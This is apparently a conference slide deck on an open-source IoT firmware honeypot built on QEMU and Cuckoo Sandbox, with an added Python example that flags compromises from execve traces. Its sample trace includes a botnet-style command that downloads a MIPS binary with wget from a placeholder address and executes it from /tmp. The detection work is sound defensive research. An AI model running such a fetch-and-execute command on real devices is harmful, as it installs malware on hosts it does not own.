NCSC One: IoT Honeypot · 2018-12-11
NCSC One: IoT Honeypot
Pieter Jansen & Jurriaan Bremer
On the agenda:
1. Introduction
2. SBIR
3. Cuckoo Sandbox
4. Project
5. Architecture
6. Offline demo
7. Roadmap
Introduction
Pieter Jansen
- CEO @ Cybersprint
- https://cybersprint.com
- Team of 25 enthusiasts
- Since 2015
- 100% Dutch
- Digital Risk Protection services
Jurriaan Bremer
- CEO, Hatching
- https://hatching.io/
- Lead Developer, Cuckoo Sandbox
- https://cuckoosandbox.org/
- 6+ years development on Cuckoo
- Growing R&D team
SBIR
This SBIR project is co-funded by the Internal Security Fund of the European Union
Balancing Security and Mobility
SBIR
- EU co-funded Project
- SBIR stage 1 (feasibility)
- SBIR stage 2 (realisation)
- SBIR stage 3 (valorisation)
- https://www.rvo.nl/subsidies-regelingen/sbir
You are here
Cuckoo Sandbox
- Leading open source automated malware analysis project
- https://cuckoosandbox.org/
- Widely used throughout the security community
- Hatching is the driving force behind the majority of Cuckoo innovations
- Cuckoo forms basis of the IoT Honeypot project
Project
- Goal: develop a firmware-based, open source Internet of Things (IoT) honeypot framework
- Consumer network devices, e.g., those used by NCSC.NL personnel at home
  - IP cameras, smart devices, etc.
- Reason: Mirai, Hajime, etc.
Project [1/2]
Hajime Botnet Makes a Comeback With Massive Scan for MikroTik Routers
Project overview - replication vs emulation
Replication-approach
1. Connect to an IoT device
2. Store the conversation (example: HTML files)
3. Spin up a service on the same port/protocol
4. Playback the earlier captured conversation
Replication-approach - conclusions
- Easy to set up fake environments
- Did not go past login screen
- Was not convincing enough for attackers
- Would only capture attempts, not infections
Project [2/2]
- Replication alternative did not work
- Goal: create open source IoT Honeypotting framework
- Goal: detect large-scale IoT compromise campaigns
- Goal: detect new threats, generate new IoCs
  - Default credentials, exploits, etc
- Scales: run dozens of IoT devices using a single server
  - Without requiring the original hardware
  - Relatively low cost & maintenance effort
Existing projects
- pyREbox, PANDA, DECAF, ISP RAS.
- x86-only (pyREbox) and x86/ARM (PANDA, different use-case)
- IoT firmware often ARM/MIPS/etc
High-level project overview
- Emulate IoT firmware using QEMU
- Expose listening network services
  - Either to internal networks or public IPv4 / IPv6 addresses
- Instrument behavioral aspects of running firmware
- …
- Wait for device to be compromised!
Goal of the project?
- Once a device is compromised, investigate :-)
  - Got system call traces and PCAPs
  - Reconstruct traffic to isolate exploit and/or payload
- Alternative use-case: honey tokens
  - Intentionally vulnerable devices with interesting names (e.g. FREDERIKSKAZERNE CAM51)
  - Notifies owners if attackers abuse it
Architecture
IoT Honeypot Architecture
QEMU
Loading of firmware non-trivial:
- In practice most firmware is non-x86: ARM & MIPS
- Needs specific QEMU command-line parameters etc
Instrumentation of QEMU interesting:
- Not so much existing research on non-x86 QEMU VMI (Virtual Machine Introspection)
- Instrumentation required to learn what device is doing
  - E.g., logging system calls such as execve(2)
Gathering results
- We obtain network traffic from the outside
- We obtain system calls from the device
- Realtime data processing
- Results stored for later research
- Alerts emitted to custom Dashboard
  - Known vulnerability was used
  - ...
QEMU command-line usage, MIPS image

/home/jbr/git/quailbox-qemu/build/mips-softmmu/qemu-system-mips \
    -kernel /home/jbr/.quailbox/kernels/vmlinux-3.18.120-4kc-malta-cuckoo \
    -nographic \
    -netdev tap,id=net0,ifname=tap_qemu,script=no,downscript=no \
    -M malta -m 512 \
    -hda /home/jbr/.quailbox/images/ext2fs-for-netgear-wnap210.image \
    -device e1000,netdev=net0 \
    -display none \
    -append "console=ttyS0 rw root=/dev/sda init=/sbin/init"

Note that the whole kernel command line passed to -append must be a single quoted argument; split across unquoted words, QEMU would only see console=ttyS0 and treat the rest as separate options.
QEMU Tiny Code Generator (“TCG”)
- Efficient engine for translating ARM/MIPS/etc into an IL (Intermediate Language)
- IL translated into the native host code, e.g., x86
- Needs customization to add our VMI
  - Syscall capturing for ARM+MIPS
  - Linux kernel modifications & tracing WIP
  - Memory tracking & dumping logic
- Additional changes required for new bug classes
  - Instrumentation for specific applications etc
Realtime tcpdump processing
- Log & process HTTP(s) requests from the outside
- Present network traffic to ruling engines
  - Suricata / Snort
  - Cuckoo / proprietary signatures
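An added example (not the project's code) of the realtime data processing step described under "Gathering results" and "Realtime tcpdump processing": execve(2) records from the instrumented firmware are correlated with inbound requests logged by the tcpdump processor, so that a download or scratch-directory execution spawned under a listening daemon raises an alert tied to the candidate exploit request, with the fetched URL extracted as an IoC. The trace line format, the daemon and downloader names, and the sample data (TEST-NET addresses, a made-up CGI path) are assumptions.

```python
import re
from collections import namedtuple
Exec = namedtuple("Exec", "ts pid ppid comm path argv")
# Assumed trace format: <ts> <pid> <ppid> <comm> execve("<path>", ["argv0", ...])
LINE = re.compile(r'^(\S+) (\d+) (\d+) (\S+) execve\("([^"]+)", \[(.*)\]\)$')
ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')
URL = re.compile(r"(?:https?|tftp)://[^\s;]+")
LISTENERS = {"httpd", "telnetd", "dropbear"}     # assumed network-facing daemons in the firmware
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}  # fetch tools commonly present in firmware
# Constructed sample data (TEST-NET addresses), not a real capture.
SAMPLE_TRACE = """\
100.0 210 1 httpd execve("/usr/sbin/httpd", ["httpd"])
105.2 231 210 httpd execve("/bin/sh", ["sh", "-c", "cd /tmp; wget http://198.51.100.7/x.mips; chmod +x x.mips; ./x.mips"])
105.3 232 231 sh execve("/usr/bin/wget", ["wget", "http://198.51.100.7/x.mips"])
106.0 233 231 sh execve("/tmp/x.mips", ["./x.mips"])
"""
SAMPLE_REQUESTS = [(104.9, "203.0.113.5", "POST", "/cgi-bin/example.cgi")]  # (ts, src, method, path)

def parse_trace(text):
    events = []
    for m in filter(None, map(LINE.match, text.splitlines())):
        events.append(Exec(float(m[1]), int(m[2]), int(m[3]), m[4], m[5], ARG.findall(m[6])))
    return events

def listener_ancestor(ev, by_pid):
    """Walk ppid links; return the network daemon this process descends from, or None."""
    pid = ev.ppid
    while pid in by_pid:
        if by_pid[pid].comm in LISTENERS:
            return by_pid[pid]
        pid = by_pid[pid].ppid
    return None

def find_alerts(trace, requests, window=10.0):
    """Alert on downloads / scratch-dir execution under a listener, tied to the latest prior request."""
    events = parse_trace(trace)
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        daemon = listener_ancestor(ev, by_pid)
        iocs = [u for arg in ev.argv for u in URL.findall(arg)]
        kind = ("download" if iocs or ev.path.rsplit("/", 1)[-1] in DOWNLOADERS else
                "payload-exec" if ev.path.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")) else None)
        if daemon is None or kind is None:
            continue
        prior = [r for r in requests if 0 <= ev.ts - r[0] <= window]  # inbound requests within window
        src = max(prior, key=lambda r: r[0])[1] if prior else None
        alerts.append({"kind": kind, "via": daemon.comm, "src": src, "iocs": iocs})
    return alerts
```

Feeding the real trace and request streams in instead of the samples turns this into the dashboard alert source; the `iocs` field is what would be stored for later research.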
Offline Demo
Roadmap
- Create web interface for managing virtual IoT environments
- "Load" support for many more firmware images
- Tailored QEMU VMI support for:
  - Different CPU architectures
  - Different known versions of Linux kernel for allowing in-depth VMI
    - E.g., through Volatility / Rekall integration
- Documentation of more relevant bug classes
- Capability for identifying said bug classes
- Protection against QEMU breakouts..
- Interaction through simulation of peripherals like camera/files/sensors
- OT/SCADA/ICS applications (virtual Borssele)
- So much more.. ;-)
Valorization
Valorization: Commercial Applications
- Fuzzing as a Service
  - Provide security testing services for hardware providers, allowing large-scale/automated testing for any firmware
- Commercial / open source bespoke additions for specific use-cases
  - OT-applications, applications for non-standard firmware
- Hosting of virtual IoT Environments
  - Creating virtual 'digital twin' of sensitive IoT environments for research purposes
  - Collect threat intelligence to support adversary attribution research
How you can help
1. Share your firmware
2. Provide testing grounds
3. Spread the word!
Credits
The HoneyNED project team
Andrei Costin ([email protected]), Assistant Professor in Cybersecurity/IoT, welcomes research and collaboration opportunities